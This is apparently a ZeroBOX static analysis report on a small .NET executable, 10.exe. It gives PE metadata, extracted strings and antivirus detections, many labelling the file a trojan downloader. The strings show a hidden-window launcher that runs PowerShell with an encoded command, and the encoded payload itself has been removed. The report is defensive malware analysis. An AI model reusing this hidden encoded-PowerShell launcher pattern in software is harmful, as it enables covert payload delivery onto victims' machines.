Static | ZeroBOX

PE Compile Time

2023-03-14 03:52:24

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x00000bc4    0x00000c00        3.90262212155
.rsrc   0x00004000       0x00000570    0x00000600        4.19505825562
.reloc  0x00006000       0x0000000c    0x00000200        0.0815394123432

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x000040a0  0x00000234  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x000042d8  0x00000296  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, ASCII text

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
10.exe
aieccxpxvqqhruwjcanxvfwagjt
mscorlib
System
Object
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
System.Diagnostics
ProcessStartInfo
set_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
set_CreateNoWindow
Process
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="1.8.6.3" name="dpxeujfrylyzbfgzvauts" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</asmv1:assembly>
powershell
-EncodedCommand [Base64-encoded PowerShell command removed]
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
10.exe
LegalCopyright
OriginalFilename
10.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0

Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Clean
tehtris Clean
DrWeb Clean
MicroWorld-eScan Gen:Variant.Barys.382335
ClamAV Clean
FireEye Generic.mg.ae120eba5b9a92de
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Trojan.Agent.PGen
VIPRE Gen:Variant.Barys.382335
Sangfor Clean
CrowdStrike win/malicious_confidence_90% (D)
BitDefender Gen:Variant.Barys.382335
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Gen:NN.ZemsilF.36344.am0@aSy7lLp
VirIT Clean
Cyren W32/MSIL_Agent.DIE.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.MAE
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Trojan-FUTR!AE120EBA5B9A
Trapmine suspicious.low.ml.score
CMC Clean
Emsisoft Gen:Variant.Barys.382335 (B)
SentinelOne Static AI - Malicious PE
GData Gen:Variant.Barys.382335
Jiangmin Clean
Webroot Clean
Avira HEUR/AGEN.1235039
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Barys.D5D57F
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:MSIL/AsyncRat.NEAG!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5148890
Acronis Clean
VBA32 Clean
ALYac Gen:Variant.Barys.382335
MAX malware (ai score=85)
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.MSIL.CoinMiner
MaxSecure Trojan.Malware.121218.susgen
Fortinet MSIL/Agent.MAE!tr
AVG MSIL:Downloader-PB [Trj]
Avast MSIL:Downloader-PB [Trj]
No IRMA results available.